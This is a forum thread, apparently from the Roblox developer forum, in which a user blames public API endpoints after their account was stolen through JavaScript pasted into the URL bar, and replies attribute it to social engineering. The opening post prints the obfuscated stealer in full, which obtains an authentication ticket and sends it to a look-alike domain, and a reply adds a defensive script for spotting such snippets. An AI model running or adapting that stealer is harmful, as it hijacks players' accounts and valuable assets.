Roblox Endpoint APIs Should Not Be Public

My account was recently compromised by one of the JavaScript breaches. We did a ton of digging and research into the breach after it happened, and it was partially my own fault and partially due to some extreme insecurities in the Roblox public API endpoints.

I was helping a developer learn to dev, when they managed to get me to paste JavaScript code into my URL bar that was meant to call a Roblox public API endpoint. (Stupid of me, for sure; I was off guard as they had gained my trust.) I will not post the code here for obvious reasons, but if anyone wants to review it safely, DM me.

We did some brief digging and found the core code being run behind the scenes is this:

async function payload2() {
    var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid") + "&_=" + Math.random())).json()).Url)).json()).textures[0]

    for (var i = 31, t = 0; t < 32; t++)
        i ^= hash[t].charCodeAt(0);

    location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash
}
(async function(){var _0x2416b1=(await(await fetch('/home',{'credentials':'include'}))['text']())['split']('setToken(\x27')[0x1]['split']('\x27)')[0x0];var _0x12edd1=(await fetch('https://auth.roblox.com/v1/authentication-ticket',{'method':'POST','credentials':'include','headers':{'x-csrf-token':_0x2416b1}}))['headers']['get']('rbx-authentication-ticket');await fetch('https://profile-roblox.com/send22test.php'+'?t='+_0x12edd1);await payload2()}());

The main issue seems to be that the endpoints are just directly public, which is simply a direct avenue for abuse, either to breach accounts like here, or to create endless bots. They literally just ask Roblox for the information on the account, and Roblox straight up gives it to them.

My team and I are not Roblox engineers, so our view of the matter is limited, but the only valid reason we could think of to have these endpoint APIs being public is for analytics, which could instead be done the same way Instagram does it, where these APIs are only provided to specifically approved people.

From our limited point of view, it just really doesn’t seem like it’s worth the absolutely massive security breaches that they cause, for so little function in return, considering how often this is happening now, and how much is being lost because of it.

13 Likes

These endpoints exist so that Roblox itself can access them for its own services. The most important line here is the last line; nothing else matters. Did you read the big warning that shows when you open the console on the Roblox website? It explicitly states:

 Keep your account safe! Do not send any information from
 here to anyone or paste any text here.

 If someone is asking you to copy or paste text here then
 you're giving someone access to your account, your gear,
 and your Robux.

These endpoints aren’t necessarily public. You were logged in at the time of running this chunk of code which means your cookies (specifically .ROBLOSECURITY) were passed to the /v1/authentication-ticket endpoint. This endpoint can’t be accessed as far as I know without a .ROBLOSECURITY token which you can only get by being logged in.

Public API endpoints are not just for analytics. They’re used in library wrappers like noblox.js and bloxy to give users the ability to program bots, websites, and games that interact with the Roblox website. These endpoints let you do things like change a member’s rank or send messages to users. I do agree that the API system could be improved but making all API endpoints private is not a solution.

4 Likes

Actually you do not at all need to be logged in for this to work, as long as your data is still being stored by Roblox. We tested this with other accounts, and it will provide them with the information to any account currently stored on that computer, not just one you’re logged into.

And no, that warning is unfortunately not available when this happens, since it is done via the URL, not via the console on the website.

This happened because you trusted someone, they led you astray, you ignored the warnings that are specifically stated in the console, and you went ahead and did it anyway. Partially should be fully. Almost curious as to why it was done, because typically people post code for gain (i.e. free Robux, free lifetime Premium, etc.).

Also, that specific endpoint only works if you have a valid cookie (i.e. you’re logged in). It’s not a security breach because Roblox’s system is largely cookie-based with an emphasis on CSRF tokens. The endpoint that you listed can’t be invoked from a browser’s URL bar. Most browsers only support GET requests in their URLs by default.

Do I agree that Roblox has poor security & should follow a different authentication system? Yes.

Do I think that Roblox was at fault here? No.

Please don’t post random code on your main account. Use an alt that can’t be traced back to you, in a VM or incognito window, instead. Also, whatever site it points to probably has your IP. Not that an IP alone can do much, but it’s something to think about.

https://auth.roblox.com/docs#!/AuthenticationTicket/post_v1_authentication_ticket

1 Like

If Roblox didn’t publish any information about endpoints, it would take a dedicated hacker (which these people are; this social engineering trick is pretty cunning after all) a whopping 10 minutes extra just leaving the Chrome console or any other network sniffer on and inspecting network traffic to find these endpoints. And then they document it amongst themselves, and it might as well have been published properly from the source so that legitimate third-party developers have an easier time using it.

Security through obscurity doesn’t really solve anything.

25 Likes

Incorrect.

That endpoint doesn’t work if you pass no headers and cookies. Again, this only works if you were logged in. This isn’t an issue with Roblox. If a user tells you to insert a chunk of code and start it with console: in the URL bar, no warning can save you. The code is executed immediately. If you wanted to protect users, you would have a warning that shows up every time you visit Roblox that says “Don’t put things in your URL bar!”, but that is detrimental to the user experience.

6 Likes

These endpoints are used for basic login tasks; they can’t just be made private, because your computer needs them to send your login credentials.

I cannot stress this enough: never run code you don’t understand. In the example you posted, you can visibly see the code that sends your hashed authentication data to a fake domain.
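To make that “visibly see” step concrete, here is an added triage script (not from the poster or from Roblox) that decodes the hex string escapes used in the snippet above, rejoins split string literals, and lists every literal fetch() target, flagging hosts that are not under roblox.com. The sample input and the look-alike domain in it are constructed placeholders, and the trusted-suffix list is an assumption.

```python
import re
from urllib.parse import urlsplit

# Hosts the pasted snippet is allowed to talk to; everything else is suspect (assumed list).
TRUSTED_SUFFIXES = ("roblox.com",)

def decode_js_escapes(src: str) -> str:
    """Replace \\xNN and \\uNNNN escapes with the characters they hide."""
    src = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), src)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), src)

def join_concatenated_strings(src: str) -> str:
    """Merge 'a'+'b' literal concatenations so a URL split into pieces reads whole."""
    pattern = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
    prev = None
    while prev != src:  # repeat until no adjacent literal pairs remain
        prev = src
        src = pattern.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), src)
    return src

def fetch_targets(src: str) -> list:
    """Return every literal URL passed to fetch(). Computed URLs such as
    fetch(x.Url) are invisible to this scan and still need reading by hand."""
    cleaned = join_concatenated_strings(decode_js_escapes(src))
    return [m.group(2) for m in re.finditer(r"""fetch\(\s*(['"])([^'"]+)\1""", cleaned)]

def triage(src: str, trusted=TRUSTED_SUFFIXES) -> list:
    """Classify each fetch target as same-origin, trusted host, or UNTRUSTED."""
    findings = []
    for url in fetch_targets(src):
        host = urlsplit(url).hostname
        if host is None:
            verdict = "same-origin"
        elif any(host == t or host.endswith("." + t) for t in trusted):
            verdict = "trusted"
        else:
            verdict = "UNTRUSTED"  # e.g. a look-alike domain that is not roblox.com
        findings.append((url, host, verdict))
    return findings

# Constructed sample in the style of the snippet above; the final domain is a placeholder.
SAMPLE = r"""(async function(){var _0x1=(await(await fetch('/home',{'credentials':'include'}))['text']())['split']('setToken(\x27')[0x1];
var _0x2=(await fetch('https://auth.roblox.com/v1/authentication-ticket',{'method':'POST','headers':{'x-csrf-token':_0x1}}))['headers']['get']('rbx-authentication-ticket');
await fetch('https://profile-roblox.example'+'/collect.php'+'?t='+_0x2);}());"""

if __name__ == "__main__":
    for url, host, verdict in triage(SAMPLE):
        print(f"{verdict:12} {host or '(same origin)':28} {url}")
```

The third line of output is the one that matters: a ticket obtained from a roblox.com endpoint is sent to a host that merely contains the word “roblox”.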

You’re right… Anything can be hacked if you give it enough time. You are also sort of right when saying STO doesn’t really solve anything. However, I don’t think this post should be ignored and summed up with the statement of, well, “it would just take them extra time to sniff the traffic, using Burp Suite, Chrome Debugger or some other tool to find the endpoints”. Roblox is a huge target of attacks that, when performed successfully, will compromise not only personal data, but assets that are worth real-world currency; unfortunately, these endpoints are used all the time in malicious ways.

What should really be discussed in this post, I believe, is brainstorming how the platform could be more secure. Again, it will never be totally secure… nothing will be. However, STO, for example, is one of those ways in which these sorts of attacks can be mitigated, giving the very possible outcome of a reduction in the mass amount of breached accounts, bot accounts, etc.

1 Like

There are other feature requests about this already – TOTP, better 2FA methods, etc. You can find them via search in the top-right.

2 Likes

Alright I know this is an old topic, sorry about that.

I think the Roblox API endpoints should remain public. It truly can open a lot of doors for developers that would be closed without them. Having only some people have access to the endpoints isn’t really feasible, because the client of literally everyone who plays Roblox needs it to log into Roblox. This isn’t really a reason why the API endpoints should be privatized even if they could be, either. You wouldn’t even need the endpoints to breach an account this way. One could just get the authentication cookie and make a POST request to some HTTP server that stores the authentication cookie in a database.

My friend, I say this with all of the love and kindness in my heart: the security breach had nothing to do with the publicity of the API endpoints. You ran code that you didn’t look into deep enough in your browser. It’s not even partially Roblox’s fault. Regard this as a learning experience, don’t paste code into your browser.

This thread is made obsolete by these more specific topics: